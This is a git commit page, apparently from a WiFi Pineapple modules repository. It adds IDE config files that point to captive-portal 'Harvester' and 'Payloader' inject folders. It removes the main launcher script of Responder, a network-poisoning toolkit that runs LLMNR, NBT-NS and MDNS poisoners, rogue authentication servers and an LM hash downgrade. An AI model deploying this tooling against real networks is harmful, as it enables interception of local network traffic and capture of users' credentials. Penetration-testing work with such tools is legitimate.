DSR! 2 жил өмнө
parent
commit
72455d1ba6

Файлын зөрүү хэтэрхий том тул дарагдсан байна
+ 0 - 0
json/upgrades.json


+ 8 - 0
modules/.idea/.gitignore

@@ -0,0 +1,8 @@
+# Default ignored files
+/shelf/
+/workspace.xml
+# Editor-based HTTP Client requests
+/httpRequests/
+# Datasource local storage ignored files
+/dataSources/
+/dataSources.local.xml

+ 22 - 0
modules/.idea/modules.iml

@@ -0,0 +1,22 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<module type="WEB_MODULE" version="4">
+  <component name="NewModuleRootManager">
+    <content url="file://$MODULE_DIR$">
+      <sourceFolder url="file://$MODULE_DIR$/src/EvilPortal/includes/skeleton" isTestSource="false" packagePrefix="evilportal" />
+      <sourceFolder url="file://$MODULE_DIR$/src/EvilPortal/includes/targeted_skeleton" isTestSource="false" packagePrefix="evilportal" />
+      <sourceFolder url="file://$MODULE_DIR$/src/PortalAuth/includes/scripts/injects/Blank" isTestSource="false" packagePrefix="evilportal" />
+      <sourceFolder url="file://$MODULE_DIR$/src/PortalAuth/includes/scripts/injects/Blank/backups" isTestSource="false" packagePrefix="evilportal" />
+      <sourceFolder url="file://$MODULE_DIR$/src/PortalAuth/includes/scripts/injects/Free_WiFi_Week" isTestSource="false" packagePrefix="evilportal" />
+      <sourceFolder url="file://$MODULE_DIR$/src/PortalAuth/includes/scripts/injects/Free_WiFi_Week/backups" isTestSource="false" packagePrefix="evilportal" />
+      <sourceFolder url="file://$MODULE_DIR$/src/PortalAuth/includes/scripts/injects/Harvester" isTestSource="false" packagePrefix="evilportal" />
+      <sourceFolder url="file://$MODULE_DIR$/src/PortalAuth/includes/scripts/injects/Harvester/backups" isTestSource="false" packagePrefix="evilportal" />
+      <sourceFolder url="file://$MODULE_DIR$/src/PortalAuth/includes/scripts/injects/Payloader" isTestSource="false" packagePrefix="evilportal" />
+      <sourceFolder url="file://$MODULE_DIR$/src/PortalAuth/includes/scripts/injects/Payloader/backups" isTestSource="false" packagePrefix="evilportal" />
+      <sourceFolder url="file://$MODULE_DIR$/src/PortalAuth/includes/scripts/skeleton" isTestSource="false" packagePrefix="evilportal" />
+      <sourceFolder url="file://$MODULE_DIR$/src/SiteSurvey/api" isTestSource="false" packagePrefix="pineapple" />
+      <sourceFolder url="file://$MODULE_DIR$/src/wps/api" isTestSource="false" packagePrefix="pineapple" />
+    </content>
+    <orderEntry type="inheritedJdk" />
+    <orderEntry type="sourceFolder" forTests="false" />
+  </component>
+</module>

+ 8 - 0
modules/.idea/modules.xml

@@ -0,0 +1,8 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<project version="4">
+  <component name="ProjectModuleManager">
+    <modules>
+      <module fileurl="file://$PROJECT_DIR$/.idea/modules.iml" filepath="$PROJECT_DIR$/.idea/modules.iml" />
+    </modules>
+  </component>
+</project>

+ 19 - 0
modules/.idea/php.xml

@@ -0,0 +1,19 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<project version="4">
+  <component name="MessDetectorOptionsConfiguration">
+    <option name="transferred" value="true" />
+  </component>
+  <component name="PHPCSFixerOptionsConfiguration">
+    <option name="transferred" value="true" />
+  </component>
+  <component name="PHPCodeSnifferOptionsConfiguration">
+    <option name="highlightLevel" value="WARNING" />
+    <option name="transferred" value="true" />
+  </component>
+  <component name="PhpStanOptionsConfiguration">
+    <option name="transferred" value="true" />
+  </component>
+  <component name="PsalmOptionsConfiguration">
+    <option name="transferred" value="true" />
+  </component>
+</project>

+ 6 - 0
modules/.idea/vcs.xml

@@ -0,0 +1,6 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<project version="4">
+  <component name="VcsDirectoryMappings">
+    <mapping directory="$PROJECT_DIR$/.." vcs="Git" />
+  </component>
+</project>

+ 0 - 314
modules/src/Responder/dep/responder/Responder.py

@@ -1,314 +0,0 @@
-#!/usr/bin/env python
-# This file is part of Responder, a network take-over set of tools 
-# created and maintained by Laurent Gaffie.
-# email: laurent.gaffie@gmail.com
-# This program is free software: you can redistribute it and/or modify
-# it under the terms of the GNU General Public License as published by
-# the Free Software Foundation, either version 3 of the License, or
-# (at your option) any later version.
-#
-# This program is distributed in the hope that it will be useful,
-# but WITHOUT ANY WARRANTY; without even the implied warranty of
-# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
-# GNU General Public License for more details.
-#
-# You should have received a copy of the GNU General Public License
-# along with this program.  If not, see <http://www.gnu.org/licenses/>.
-import optparse
-import ssl
-
-from SocketServer import TCPServer, UDPServer, ThreadingMixIn
-from threading import Thread
-from utils import *
-import struct
-banner()
-
-parser = optparse.OptionParser(usage='python %prog -I eth0 -w -r -f\nor:\npython %prog -I eth0 -wrf', version=settings.__version__, prog=sys.argv[0])
-parser.add_option('-A','--analyze',        action="store_true", help="Analyze mode. This option allows you to see NBT-NS, BROWSER, LLMNR requests without responding.", dest="Analyze", default=False)
-parser.add_option('-I','--interface',      action="store",      help="Network interface to use, you can use 'ALL' as a wildcard for all interfaces", dest="Interface", metavar="eth0", default=None)
-parser.add_option('-i','--ip',             action="store",      help="Local IP to use \033[1m\033[31m(only for OSX)\033[0m", dest="OURIP", metavar="10.0.0.21", default=None)
-
-parser.add_option('-e', "--externalip",    action="store",      help="Poison all requests with another IP address than Responder's one.", dest="ExternalIP",  metavar="10.0.0.22", default=None)
-
-parser.add_option('-b', '--basic',         action="store_true", help="Return a Basic HTTP authentication. Default: NTLM", dest="Basic", default=False)
-parser.add_option('-r', '--wredir',        action="store_true", help="Enable answers for netbios wredir suffix queries. Answering to wredir will likely break stuff on the network. Default: False", dest="Wredirect", default=False)
-parser.add_option('-d', '--NBTNSdomain',   action="store_true", help="Enable answers for netbios domain suffix queries. Answering to domain suffixes will likely break stuff on the network. Default: False", dest="NBTNSDomain", default=False)
-parser.add_option('-f','--fingerprint',    action="store_true", help="This option allows you to fingerprint a host that issued an NBT-NS or LLMNR query.", dest="Finger", default=False)
-parser.add_option('-w','--wpad',           action="store_true", help="Start the WPAD rogue proxy server. Default value is False", dest="WPAD_On_Off", default=False)
-parser.add_option('-u','--upstream-proxy', action="store",      help="Upstream HTTP proxy used by the rogue WPAD Proxy for outgoing requests (format: host:port)", dest="Upstream_Proxy", default=None)
-parser.add_option('-F','--ForceWpadAuth',  action="store_true", help="Force NTLM/Basic authentication on wpad.dat file retrieval. This may cause a login prompt. Default: False", dest="Force_WPAD_Auth", default=False)
-
-parser.add_option('-P','--ProxyAuth',       action="store_true", help="Force NTLM (transparently)/Basic (prompt) authentication for the proxy. WPAD doesn't need to be ON. This option is highly effective when combined with -r. Default: False", dest="ProxyAuth_On_Off", default=False)
-
-parser.add_option('--lm',                  action="store_true", help="Force LM hashing downgrade for Windows XP/2003 and earlier. Default: False", dest="LM_On_Off", default=False)
-parser.add_option('-v','--verbose',        action="store_true", help="Increase verbosity.", dest="Verbose")
-options, args = parser.parse_args()
-
-if not os.geteuid() == 0:
-    print color("[!] Responder must be run as root.")
-    sys.exit(-1)
-elif options.OURIP is None and IsOsX() is True:
-    print "\n\033[1m\033[31mOSX detected, -i mandatory option is missing\033[0m\n"
-    parser.print_help()
-    exit(-1)
-
-settings.init()
-settings.Config.populate(options)
-
-StartupMessage()
-
-settings.Config.ExpandIPRanges()
-
-if settings.Config.AnalyzeMode:
-	print color('[i] Responder is in analyze mode. No NBT-NS, LLMNR, MDNS requests will be poisoned.', 3, 1)
-
-#Create the DB, before we start Responder.
-CreateResponderDb()
-
-class ThreadingUDPServer(ThreadingMixIn, UDPServer):
-	def server_bind(self):
-		if OsInterfaceIsSupported():
-			try:
-                                if settings.Config.Bind_To_ALL:
-                                	pass
-                                else:
-					self.socket.setsockopt(socket.SOL_SOCKET, 25, settings.Config.Interface+'\0')
-			except:
-				pass
-		UDPServer.server_bind(self)
-
-class ThreadingTCPServer(ThreadingMixIn, TCPServer):
-	def server_bind(self):
-		if OsInterfaceIsSupported():
-			try:
-                                if settings.Config.Bind_To_ALL:
-                                	pass
-                                else:
-					self.socket.setsockopt(socket.SOL_SOCKET, 25, settings.Config.Interface+'\0')
-			except:
-				pass
-		TCPServer.server_bind(self)
-
-class ThreadingTCPServerAuth(ThreadingMixIn, TCPServer):
-	def server_bind(self):
-		if OsInterfaceIsSupported():
-			try:
-                                if settings.Config.Bind_To_ALL:
-                                	pass
-                                else:
-					self.socket.setsockopt(socket.SOL_SOCKET, 25, settings.Config.Interface+'\0')
-			except:
-				pass
-                self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_LINGER, struct.pack('ii', 1, 0))
-		TCPServer.server_bind(self)
-
-class ThreadingUDPMDNSServer(ThreadingMixIn, UDPServer):
-	def server_bind(self):
-		MADDR = "224.0.0.251"
-		
-		self.socket.setsockopt(socket.SOL_SOCKET,socket.SO_REUSEADDR, 1)
-		self.socket.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, 255)
-		
-		Join = self.socket.setsockopt(socket.IPPROTO_IP,socket.IP_ADD_MEMBERSHIP, socket.inet_aton(MADDR) + settings.Config.IP_aton)
-
-		if OsInterfaceIsSupported():
-			try:
-                                if settings.Config.Bind_To_ALL:
-                                	pass
-                                else:
-					self.socket.setsockopt(socket.SOL_SOCKET, 25, settings.Config.Interface+'\0')
-			except:
-				pass
-		UDPServer.server_bind(self)
-
-class ThreadingUDPLLMNRServer(ThreadingMixIn, UDPServer):
-	def server_bind(self):
-		MADDR = "224.0.0.252"
-		self.socket.setsockopt(socket.SOL_SOCKET,socket.SO_REUSEADDR,1)
-		self.socket.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, 255)
-		
-		Join = self.socket.setsockopt(socket.IPPROTO_IP,socket.IP_ADD_MEMBERSHIP,socket.inet_aton(MADDR) + settings.Config.IP_aton)
-		
-		if OsInterfaceIsSupported():
-			try:
-                                if settings.Config.Bind_To_ALL:
-                                	pass
-                                else:
-					self.socket.setsockopt(socket.SOL_SOCKET, 25, settings.Config.Interface+'\0')
-			except:
-				pass
-		UDPServer.server_bind(self)
-
-ThreadingUDPServer.allow_reuse_address = 1
-ThreadingTCPServer.allow_reuse_address = 1
-ThreadingUDPMDNSServer.allow_reuse_address = 1
-ThreadingUDPLLMNRServer.allow_reuse_address = 1
-ThreadingTCPServerAuth.allow_reuse_address = 1
-
-def serve_thread_udp_broadcast(host, port, handler):
-	try:
-		server = ThreadingUDPServer((host, port), handler)
-		server.serve_forever()
-	except:
-		print color("[!] ", 1, 1) + "Error starting UDP server on port " + str(port) + ", check permissions or other servers running."
-
-def serve_NBTNS_poisoner(host, port, handler):
-	serve_thread_udp_broadcast(host, port, handler)
-
-def serve_MDNS_poisoner(host, port, handler):
-	try:
-		server = ThreadingUDPMDNSServer((host, port), handler)
-		server.serve_forever()
-	except:
-		print color("[!] ", 1, 1) + "Error starting UDP server on port " + str(port) + ", check permissions or other servers running."
-
-def serve_LLMNR_poisoner(host, port, handler):
-	try:
-		server = ThreadingUDPLLMNRServer((host, port), handler)
-		server.serve_forever()
-	except:
-                raise
-		print color("[!] ", 1, 1) + "Error starting UDP server on port " + str(port) + ", check permissions or other servers running."
-
-def serve_thread_udp(host, port, handler):
-	try:
-		if OsInterfaceIsSupported():
-			server = ThreadingUDPServer((host, port), handler)
-			server.serve_forever()
-		else:
-			server = ThreadingUDPServer((host, port), handler)
-			server.serve_forever()
-	except:
-		print color("[!] ", 1, 1) + "Error starting UDP server on port " + str(port) + ", check permissions or other servers running."
-
-def serve_thread_tcp(host, port, handler):
-	try:
-		if OsInterfaceIsSupported():
-			server = ThreadingTCPServer((host, port), handler)
-			server.serve_forever()
-		else:
-			server = ThreadingTCPServer((host, port), handler)
-			server.serve_forever()
-	except:
-		print color("[!] ", 1, 1) + "Error starting TCP server on port " + str(port) + ", check permissions or other servers running."
-
-def serve_thread_tcp_auth(host, port, handler):
-	try:
-		if OsInterfaceIsSupported():
-			server = ThreadingTCPServerAuth((host, port), handler)
-			server.serve_forever()
-		else:
-			server = ThreadingTCPServerAuth((host, port), handler)
-			server.serve_forever()
-	except:
-		print color("[!] ", 1, 1) + "Error starting TCP server on port " + str(port) + ", check permissions or other servers running."
-
-def serve_thread_SSL(host, port, handler):
-	try:
-
-		cert = os.path.join(settings.Config.ResponderPATH, settings.Config.SSLCert)
-		key =  os.path.join(settings.Config.ResponderPATH, settings.Config.SSLKey)
-
-		if OsInterfaceIsSupported():
-			server = ThreadingTCPServer((host, port), handler)
-			server.socket = ssl.wrap_socket(server.socket, certfile=cert, keyfile=key, server_side=True)
-			server.serve_forever()
-		else:
-			server = ThreadingTCPServer((host, port), handler)
-			server.socket = ssl.wrap_socket(server.socket, certfile=cert, keyfile=key, server_side=True)
-			server.serve_forever()
-	except:
-		print color("[!] ", 1, 1) + "Error starting SSL server on port " + str(port) + ", check permissions or other servers running."
-
-def main():
-	try:
-		threads = []
-
-		# Load (M)DNS, NBNS and LLMNR Poisoners
-		from poisoners.LLMNR import LLMNR
-		from poisoners.NBTNS import NBTNS
-		from poisoners.MDNS import MDNS
-		threads.append(Thread(target=serve_LLMNR_poisoner, args=('', 5355, LLMNR,)))
-		threads.append(Thread(target=serve_MDNS_poisoner,  args=('', 5353, MDNS,)))
-		threads.append(Thread(target=serve_NBTNS_poisoner, args=('', 137,  NBTNS,)))
-
-		# Load Browser Listener
-		from servers.Browser import Browser
-		threads.append(Thread(target=serve_thread_udp_broadcast, args=('', 138,  Browser,)))
-
-		if settings.Config.HTTP_On_Off:
-			from servers.HTTP import HTTP
-			threads.append(Thread(target=serve_thread_tcp, args=('', 80, HTTP,)))
-
-		if settings.Config.SSL_On_Off:
-			from servers.HTTP import HTTP
-			threads.append(Thread(target=serve_thread_SSL, args=('', 443, HTTP,)))
-
-		if settings.Config.WPAD_On_Off:
-			from servers.HTTP_Proxy import HTTP_Proxy
-			threads.append(Thread(target=serve_thread_tcp, args=('', 3141, HTTP_Proxy,)))
-
-		if settings.Config.ProxyAuth_On_Off:
-		        from servers.Proxy_Auth import Proxy_Auth
-		        threads.append(Thread(target=serve_thread_tcp_auth, args=('', 3128, Proxy_Auth,)))
-
-		if settings.Config.SMB_On_Off:
-			if settings.Config.LM_On_Off:
-				from servers.SMB import SMB1LM
-				threads.append(Thread(target=serve_thread_tcp, args=('', 445, SMB1LM,)))
-				threads.append(Thread(target=serve_thread_tcp, args=('', 139, SMB1LM,)))
-			else:
-				from servers.SMB import SMB1
-				threads.append(Thread(target=serve_thread_tcp, args=('', 445, SMB1,)))
-				threads.append(Thread(target=serve_thread_tcp, args=('', 139, SMB1,)))
-
-		if settings.Config.Krb_On_Off:
-			from servers.Kerberos import KerbTCP, KerbUDP
-			threads.append(Thread(target=serve_thread_udp, args=('', 88, KerbUDP,)))
-			threads.append(Thread(target=serve_thread_tcp, args=('', 88, KerbTCP,)))
-
-		if settings.Config.SQL_On_Off:
-			from servers.MSSQL import MSSQL, MSSQLBrowser
-			threads.append(Thread(target=serve_thread_tcp, args=('', 1433, MSSQL,)))
-			threads.append(Thread(target=serve_thread_udp_broadcast, args=('', 1434, MSSQLBrowser,)))
-
-		if settings.Config.FTP_On_Off:
-			from servers.FTP import FTP
-			threads.append(Thread(target=serve_thread_tcp, args=('', 21, FTP,)))
-
-		if settings.Config.POP_On_Off:
-			from servers.POP3 import POP3
-			threads.append(Thread(target=serve_thread_tcp, args=('', 110, POP3,)))
-
-		if settings.Config.LDAP_On_Off:
-			from servers.LDAP import LDAP
-			threads.append(Thread(target=serve_thread_tcp, args=('', 389, LDAP,)))
-
-		if settings.Config.SMTP_On_Off:
-			from servers.SMTP import ESMTP
-			threads.append(Thread(target=serve_thread_tcp, args=('', 25,  ESMTP,)))
-			threads.append(Thread(target=serve_thread_tcp, args=('', 587, ESMTP,)))
-
-		if settings.Config.IMAP_On_Off:
-			from servers.IMAP import IMAP
-			threads.append(Thread(target=serve_thread_tcp, args=('', 143, IMAP,)))
-
-		if settings.Config.DNS_On_Off:
-			from servers.DNS import DNS, DNSTCP
-			threads.append(Thread(target=serve_thread_udp, args=('', 53, DNS,)))
-			threads.append(Thread(target=serve_thread_tcp, args=('', 53, DNSTCP,)))
-
-		for thread in threads:
-			thread.setDaemon(True)
-			thread.start()
-
-		print color('[+]', 2, 1) + " Listening for events..."
-
-		while True:
-			time.sleep(1)
-
-	except KeyboardInterrupt:
-		sys.exit("\r%s Exiting..." % color('[+]', 2, 1))
-
-if __name__ == '__main__':
-	main()

Энэ ялгаанд хэт олон файл өөрчлөгдсөн тул зарим файлыг харуулаагүй болно